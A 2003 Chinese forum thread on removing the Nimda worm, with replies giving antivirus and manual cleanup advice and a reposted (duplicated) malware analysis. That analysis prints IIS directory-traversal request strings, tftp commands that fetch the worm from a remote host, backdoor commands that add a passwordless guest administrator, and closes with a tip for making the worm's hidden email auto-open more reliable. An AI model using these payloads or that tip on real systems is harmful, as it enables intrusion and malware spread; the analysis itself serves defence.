9,506
社区成员
发帖
与我相关
我的任务
分享请发表友善的回复…
发表回复
peaky 2003-09-14
- 打赏
- 举报
用尼姆达专杀工具可以干掉,如有诺顿或是瑞星,升级到最新版本,可以干掉它的.
sungod8 2003-09-13
- 打赏
- 举报
建议将WSH(Windows Scripting Host)功能删除可预防此类病毒的破坏。 其步骤是:
“开始”->“设置”->“控制面版”->“添加删除程序”-〉“WINDOWS按装程”-〉“附件”,在“组件”中的“Windows scripting Host”(约占空间1.1MB),去掉选择,选"确定"即可,不过这样可能会影响一些功能。
“开始”->“设置”->“控制面版”->“添加删除程序”-〉“WINDOWS按装程”-〉“附件”,在“组件”中的“Windows scripting Host”(约占空间1.1MB),去掉选择,选"确定"即可,不过这样可能会影响一些功能。
sungod8 2003-09-13
- 打赏
- 举报
这是尼姆达病毒 http://www.softhouse.com.cn/docs/southpark1845.html
Windows Nt/2000/XP的手工清除方法
1、结束其中进程名称为"xxx.tmp.exe"以及"Load.exe"的进程(xxx为任意文件名)
2、删除系统temp文件夹中文件长度为57344的文件
3、删除系统System文件夹中的长度为57344字节的Riched20.DLL文件及load.exe
4、打开System.ini文件,在[load]中如果有一行"shell=explorer.exe load.exe -dontrunold",则改为"shell=explorer.exe"
5、在硬盘区的根目录下寻找Admin.DLL文件,如果在根目录下存在该文件,则删除它
6、打开"控制面板|用户和密码",将Administrator组中的guest帐号删除
7、把C盘的完全共享取消掉
8、搜索整个硬盘,把所有readme.eml的文件删除,这时在你没有对系统进行免疫修复前,请不要点击任何readme.eml文件,用ctrl+A选取全部readme.eml文件,删除掉,如果单击了单个readme.eml文件,"概念"病毒将利用你的系统漏洞重新运行。
Win9X/Me的手工清除方法
1、重启操作系统进入到安全模式
2、删除系统temp文件夹中文件长度为57344的文件
3、删除系统System文件夹中的长度为57344字节的Riched20.DLL文件及load.exe
4、打开System.ini文件,在[load]中如果有一行"shell=explorer.exe load.exe -dontrunold",则改为"shell=explorer.exe"
5、把C盘的完全共享取消掉
6、搜索整个硬盘,把所有readme.eml的文件删除,这时在你没有对系统进行免疫修复前,请不要点击任何readme.eml文件,用ctrl+A选取全部readme.eml文件,删除掉,如果单击了单个readme.eml文件,"概念"病毒将利用你的系统漏洞重新运行。
·免疫和防护方案
“预防胜于治疗”,“概念”病毒之所以能够在这么短的时间内传播和感染了这么多的机器,很大程度上于个人用户的网络安全观念不强有关。许多用户根本没有想到要去安装操作系统的补丁,以至于让病毒乘虚而入,连连得手。如果用户做足了防护措施,那么这个病毒是不可能如此的肆虐的。建议做好以下防护工作:
1、 打上微软官方的补丁SP2
微软官方已经就WINDOWS2000系统目前发现的漏洞做了个"十全大补"的补丁,可以弥补绝大部分的win2000漏洞。SP2共100M左右,可以到以下网址下载:
http://www.microsoft.com/windows2000/downloads
/critical/q269862/default.asp
Windows Nt/2000/XP的手工清除方法
1、结束其中进程名称为"xxx.tmp.exe"以及"Load.exe"的进程(xxx为任意文件名)
2、删除系统temp文件夹中文件长度为57344的文件
3、删除系统System文件夹中的长度为57344字节的Riched20.DLL文件及load.exe
4、打开System.ini文件,在[load]中如果有一行"shell=explorer.exe load.exe -dontrunold",则改为"shell=explorer.exe"
5、在硬盘区的根目录下寻找Admin.DLL文件,如果在根目录下存在该文件,则删除它
6、打开"控制面板|用户和密码",将Administrator组中的guest帐号删除
7、把C盘的完全共享取消掉
8、搜索整个硬盘,把所有readme.eml的文件删除,这时在你没有对系统进行免疫修复前,请不要点击任何readme.eml文件,用ctrl+A选取全部readme.eml文件,删除掉,如果单击了单个readme.eml文件,"概念"病毒将利用你的系统漏洞重新运行。
Win9X/Me的手工清除方法
1、重启操作系统进入到安全模式
2、删除系统temp文件夹中文件长度为57344的文件
3、删除系统System文件夹中的长度为57344字节的Riched20.DLL文件及load.exe
4、打开System.ini文件,在[load]中如果有一行"shell=explorer.exe load.exe -dontrunold",则改为"shell=explorer.exe"
5、把C盘的完全共享取消掉
6、搜索整个硬盘,把所有readme.eml的文件删除,这时在你没有对系统进行免疫修复前,请不要点击任何readme.eml文件,用ctrl+A选取全部readme.eml文件,删除掉,如果单击了单个readme.eml文件,"概念"病毒将利用你的系统漏洞重新运行。
·免疫和防护方案
“预防胜于治疗”,“概念”病毒之所以能够在这么短的时间内传播和感染了这么多的机器,很大程度上于个人用户的网络安全观念不强有关。许多用户根本没有想到要去安装操作系统的补丁,以至于让病毒乘虚而入,连连得手。如果用户做足了防护措施,那么这个病毒是不可能如此的肆虐的。建议做好以下防护工作:
1、 打上微软官方的补丁SP2
微软官方已经就WINDOWS2000系统目前发现的漏洞做了个"十全大补"的补丁,可以弥补绝大部分的win2000漏洞。SP2共100M左右,可以到以下网址下载:
http://www.microsoft.com/windows2000/downloads
/critical/q269862/default.asp
回炉重造,学习编程中。。。 2003-09-13
- 打赏
- 举报
同意楼上的,找个专杀工具吧
smallrascal 2003-09-13
- 打赏
- 举报
用尼姆达的专杀工具可以杀掉的
smallrascal 2003-09-13
- 打赏
- 举报
Nimda/尼姆达蠕虫分析报告
-----------------------------------------
2001.9.18晚,我习惯性的打开了tcp/80,用这个简单的批处理程序:
-------------cut here-----------
@echo off
:start
nc -vv -w 5 -l -p 80>>httpd.log
goto start
--------------------------------
通常我用它来监测CodeXXX之类的分布,另外还指望运气好能弄到个把变种。虽然偶尔会收到几个扫描代理服务器的噪声,但一般都是"rcvd 3818"。忽然我发现从某个IP来了连续的几个一百字节左右的数据,打开httpd.log一看原来是是一个http扫描,目的是寻找unicode_hole和CodeRedII建立的root.exe。我没理它,可是在不到5分钟的时间里我连续收到了几个发自不同IP的同种扫描,难道这就是CodeBlue?我开了一个真正的honeypot,不管对方GET什么都回应"200 OK",结果马上就看到了实质性的东西:"GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0"好,满足你的要求。运行"tftp -i xxx.xxx.xxx.xxx GET Admin.dll",结果马上就得到了好东西,赶紧反编译一下看看,然后再……@#$……%^&……总算弄清楚了个大概,先写一个分析报告吧。
---------------------------------------------------------------
名称:Worm.Concept.57344 (Nimda/尼姆达)
类型:蠕虫/病毒
受影响的系统:Windows 95, Windows 98, Windows Me, Windows NT 4, Windows 2000
大小:57344字节
蠕虫文件:
[mmc.exe]
出现在windows文件夹,蠕虫扫描和创建tftpd的进程就是它。注意windows系统文件夹里也有一个mmc.exe,那不是Nimda。
[riched20.dll]
riched20.dll除了出现在windows系统文件夹里,还可能出现在任何有*.doc文件的文件夹里。因为它是winword.exe和wordpad.exe运行时都要调用的所以当打开DOC文件时就等于运行了Nimda。
[Admin.dll]
(Admin.dll除了在C:,D:,E:的根目录外还可出现在下面的"TFTP*****"出现的地方)
[load.exe]
出现在windows系统文件夹
[%temp%\readme*.exe]
[TFTP****]
形如TFTP3233。文件位置取决于使用tftp的目录。如果是"GET /scripts/root.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"那么位置就在"Inetpub\scripts\"。如果是"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"那么位置就在"/scripts/..%c1%1c../"也就是根目录。
/*以上都是蠕虫文件的可执行程序,它们之间的区别只有文件名不同*/
[readme.eml]
这个东西是值得一提的,他利用了IE5(或者说OE5)的一个漏洞。我们知道html格式的邮件中图片和多媒体文件都是自动打开的,而可执行文件不是。但如果把可执行文件指定为多媒体类型,也会自动下载打开。下面是readme.eml的一段:
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
另外,如果文件夹是“按web页查看”,那么即使只是用鼠标单击选中readme.eml也会导致蠕虫的执行,如果把扩展名改为mht也是可以的,但改为htm就不行。
[readme.nws]
同readme.eml,只是出现的几率很小。
[*.exe]
可执行文件被感染,所以可能是任何文件名。
传播方式:
(一)通过email
在internet临时文件夹中读取所有"htm","html"文件并从中提取email地址,从信箱读取email并从中提取SMTP服务器,然后发送readme.eml。
(二)通过unicode_hole或CodeRedII建立的root.exe
unicode_hole我就不多说了,CodeRedII会在IIS的几个可执行目录下放置root.exe也是尽人皆知,Nimda首先在udp/69上启动一个tftp服务器,然后会作以下扫描
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
一旦发现有弱点的系统就使用类似下面的命令
GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0
把文件传到主机上去,然后再GET /scripts/Admin.dll HTTP/1.0
(三)通过WWW服务
在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件所在目录中创建readme.eml,并在文件末加上下面这一行<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
也就是说如果一台web服务器被感染了,那么大部分访问过此服务器的机器都会被感染。
(四)通过局域网
Nimda会搜索本地的共享目录中包含doc文件的目录,一但找到,就会把自身复制到目录中命名为riched20.dll(原理见前)
(五)以病毒的方式
搜索[SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths]寻找在远程主机上的可执行文件,一旦找到,Nimda就会以病毒的方式感染文件。有一点不同的是,它把原文件作为资源存储在新文件中,运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32.exe,它不会感染winzip32.exe,可能是作者发现winzip染毒后不能正常运行吧。
确保运行:
病毒采取以下措施确保自己处于活跃状态
1)把自己复制到windows系统文件夹里命名为riched20.dll(原理见前)
2)把自己复制到windows系统文件夹里命名为load.exe,
修改system.ini把
shell=explorer.exe改为
shell=explorer.exe load.exe -dontrunold
使病毒在下次系统启动时运行。
创建后门:
1)Nimda打开的udp/69虽然目的并不是作后门,但的的确确是一个后门。
2)如果有足够权限将调用"net.exe"执行以下系统命令:
net user guest /add
net user guest /active
net user guest ""
net localgroup Administrators guest
net localgroup Guests guest /add
结果是空密码的guest加到了Administrators组中。
2)如果有足够权限将调用"net.exe"执行以下系统命令:
net share c$=c:\
删除[SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security]的所有子键,结果是C:\设为完全共享。
其它几个常见问题:
1)Nimda什么时候进入我国?
我手头最早的一行日志是:
2001-09-18 13:40:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+tftp%20-i%2061.133.3.126%20GET%20Admin.dll%20Admin.dll 502 -
也就是说肯定早于2001-09-18 13:40:25
2)Nimda的作者是谁?
程序的作者在程序中留下了以下标记:
fsdhqherwqi2001
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
可能对最终找出作者有帮助。
3)为什么说Nimda是“概念”蠕虫?
它可以通过至少五种方式传播
它是一个带exe扩展名的dll,可以做为可执行文件运行,也可作为dll运行。
它有智慧:当它名为Admin.dll被运行时,它会把自己复制到windows文件夹命名为mmc.exe并带上参数"-qusery9bnow"运行。
当它名为readme.exe被运行时,它会把自己复制到%temp%带上参数"-dontrunold"运行.
它会把自己的属性设为“系统”“隐藏”,再改写注册表,使“系统”“隐藏”属性的程序在资源管理器中不可见。
它是一个主机扫描器,一个弱点扫描器,一个后门程序;带有多个Exploit,掌握最新的安全信息;它就是一个黑客。
4)如何清除Nimda?
在文件夹选项里设置“显示所有文件”
删除mmc.exe/load.exe/riched20.dll/admin.dll/readme.eml/readme.exe等所有蠕虫文件。
检查所有大小为57344或79225的文件。
可以使用“查找”工具,搜索包含"fsdhqherwqi2001"的*.exe/*.dll和包含"Kz29vb29oWsrLPh4eisrPb09Pb2"的*.eml/*.nws。
检查system.ini。
检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。
删除C:\的共享
最好再检查一下C:\和D:\有没有explorer.exe,除非确信一定没有感染CodeRedII。
重起系统
一点改进意见:
Nimda用JavaScript的"window.open"函数来打开readme.eml,这并不可靠,稍具安全常识的人都会调整IE的脚本支持
选项,有些人干脆关掉java,但是用下面这个方法就没问题了:
<frameset cols="0,*"><frame src="readme.eml">
-----------------------------------------
2001.9.18晚,我习惯性的打开了tcp/80,用这个简单的批处理程序:
-------------cut here-----------
@echo off
:start
nc -vv -w 5 -l -p 80>>httpd.log
goto start
--------------------------------
通常我用它来监测CodeXXX之类的分布,另外还指望运气好能弄到个把变种。虽然偶尔会收到几个扫描代理服务器的噪声,但一般都是"rcvd 3818"。忽然我发现从某个IP来了连续的几个一百字节左右的数据,打开httpd.log一看原来是是一个http扫描,目的是寻找unicode_hole和CodeRedII建立的root.exe。我没理它,可是在不到5分钟的时间里我连续收到了几个发自不同IP的同种扫描,难道这就是CodeBlue?我开了一个真正的honeypot,不管对方GET什么都回应"200 OK",结果马上就看到了实质性的东西:"GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0"好,满足你的要求。运行"tftp -i xxx.xxx.xxx.xxx GET Admin.dll",结果马上就得到了好东西,赶紧反编译一下看看,然后再……@#$……%^&……总算弄清楚了个大概,先写一个分析报告吧。
---------------------------------------------------------------
名称:Worm.Concept.57344 (Nimda/尼姆达)
类型:蠕虫/病毒
受影响的系统:Windows 95, Windows 98, Windows Me, Windows NT 4, Windows 2000
大小:57344字节
蠕虫文件:
[mmc.exe]
出现在windows文件夹,蠕虫扫描和创建tftpd的进程就是它。注意windows系统文件夹里也有一个mmc.exe,那不是Nimda。
[riched20.dll]
riched20.dll除了出现在windows系统文件夹里,还可能出现在任何有*.doc文件的文件夹里。因为它是winword.exe和wordpad.exe运行时都要调用的所以当打开DOC文件时就等于运行了Nimda。
[Admin.dll]
(Admin.dll除了在C:,D:,E:的根目录外还可出现在下面的"TFTP*****"出现的地方)
[load.exe]
出现在windows系统文件夹
[%temp%\readme*.exe]
[TFTP****]
形如TFTP3233。文件位置取决于使用tftp的目录。如果是"GET /scripts/root.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"那么位置就在"Inetpub\scripts\"。如果是"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"那么位置就在"/scripts/..%c1%1c../"也就是根目录。
/*以上都是蠕虫文件的可执行程序,它们之间的区别只有文件名不同*/
[readme.eml]
这个东西是值得一提的,他利用了IE5(或者说OE5)的一个漏洞。我们知道html格式的邮件中图片和多媒体文件都是自动打开的,而可执行文件不是。但如果把可执行文件指定为多媒体类型,也会自动下载打开。下面是readme.eml的一段:
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
另外,如果文件夹是“按web页查看”,那么即使只是用鼠标单击选中readme.eml也会导致蠕虫的执行,如果把扩展名改为mht也是可以的,但改为htm就不行。
[readme.nws]
同readme.eml,只是出现的几率很小。
[*.exe]
可执行文件被感染,所以可能是任何文件名。
传播方式:
(一)通过email
在internet临时文件夹中读取所有"htm","html"文件并从中提取email地址,从信箱读取email并从中提取SMTP服务器,然后发送readme.eml。
(二)通过unicode_hole或CodeRedII建立的root.exe
unicode_hole我就不多说了,CodeRedII会在IIS的几个可执行目录下放置root.exe也是尽人皆知,Nimda首先在udp/69上启动一个tftp服务器,然后会作以下扫描
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
一旦发现有弱点的系统就使用类似下面的命令
GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0
把文件传到主机上去,然后再GET /scripts/Admin.dll HTTP/1.0
(三)通过WWW服务
在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件所在目录中创建readme.eml,并在文件末加上下面这一行<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
也就是说如果一台web服务器被感染了,那么大部分访问过此服务器的机器都会被感染。
(四)通过局域网
Nimda会搜索本地的共享目录中包含doc文件的目录,一但找到,就会把自身复制到目录中命名为riched20.dll(原理见前)
(五)以病毒的方式
搜索[SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths]寻找在远程主机上的可执行文件,一旦找到,Nimda就会以病毒的方式感染文件。有一点不同的是,它把原文件作为资源存储在新文件中,运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32.exe,它不会感染winzip32.exe,可能是作者发现winzip染毒后不能正常运行吧。
确保运行:
病毒采取以下措施确保自己处于活跃状态
1)把自己复制到windows系统文件夹里命名为riched20.dll(原理见前)
2)把自己复制到windows系统文件夹里命名为load.exe,
修改system.ini把
shell=explorer.exe改为
shell=explorer.exe load.exe -dontrunold
使病毒在下次系统启动时运行。
创建后门:
1)Nimda打开的udp/69虽然目的并不是作后门,但的的确确是一个后门。
2)如果有足够权限将调用"net.exe"执行以下系统命令:
net user guest /add
net user guest /active
net user guest ""
net localgroup Administrators guest
net localgroup Guests guest /add
结果是空密码的guest加到了Administrators组中。
2)如果有足够权限将调用"net.exe"执行以下系统命令:
net share c$=c:\
删除[SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security]的所有子键,结果是C:\设为完全共享。
其它几个常见问题:
1)Nimda什么时候进入我国?
我手头最早的一行日志是:
2001-09-18 13:40:25 xxx.xxx.xxx.xxx - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+tftp%20-i%2061.133.3.126%20GET%20Admin.dll%20Admin.dll 502 -
也就是说肯定早于2001-09-18 13:40:25
2)Nimda的作者是谁?
程序的作者在程序中留下了以下标记:
fsdhqherwqi2001
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
可能对最终找出作者有帮助。
3)为什么说Nimda是“概念”蠕虫?
它可以通过至少五种方式传播
它是一个带exe扩展名的dll,可以做为可执行文件运行,也可作为dll运行。
它有智慧:当它名为Admin.dll被运行时,它会把自己复制到windows文件夹命名为mmc.exe并带上参数"-qusery9bnow"运行。
当它名为readme.exe被运行时,它会把自己复制到%temp%带上参数"-dontrunold"运行.
它会把自己的属性设为“系统”“隐藏”,再改写注册表,使“系统”“隐藏”属性的程序在资源管理器中不可见。
它是一个主机扫描器,一个弱点扫描器,一个后门程序;带有多个Exploit,掌握最新的安全信息;它就是一个黑客。
4)如何清除Nimda?
在文件夹选项里设置“显示所有文件”
删除mmc.exe/load.exe/riched20.dll/admin.dll/readme.eml/readme.exe等所有蠕虫文件。
检查所有大小为57344或79225的文件。
可以使用“查找”工具,搜索包含"fsdhqherwqi2001"的*.exe/*.dll和包含"Kz29vb29oWsrLPh4eisrPb09Pb2"的*.eml/*.nws。
检查system.ini。
检查所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件。
删除C:\的共享
最好再检查一下C:\和D:\有没有explorer.exe,除非确信一定没有感染CodeRedII。
重起系统
一点改进意见:
Nimda用JavaScript的"window.open"函数来打开readme.eml,这并不可靠,稍具安全常识的人都会调整IE的脚本支持
选项,有些人干脆关掉java,但是用下面这个方法就没问题了:
<frameset cols="0,*"><frame src="readme.eml">
lijiuhua0721 2003-09-13
- 打赏
- 举报
用最新版的瑞星DOS杀毒盘启动杀毒
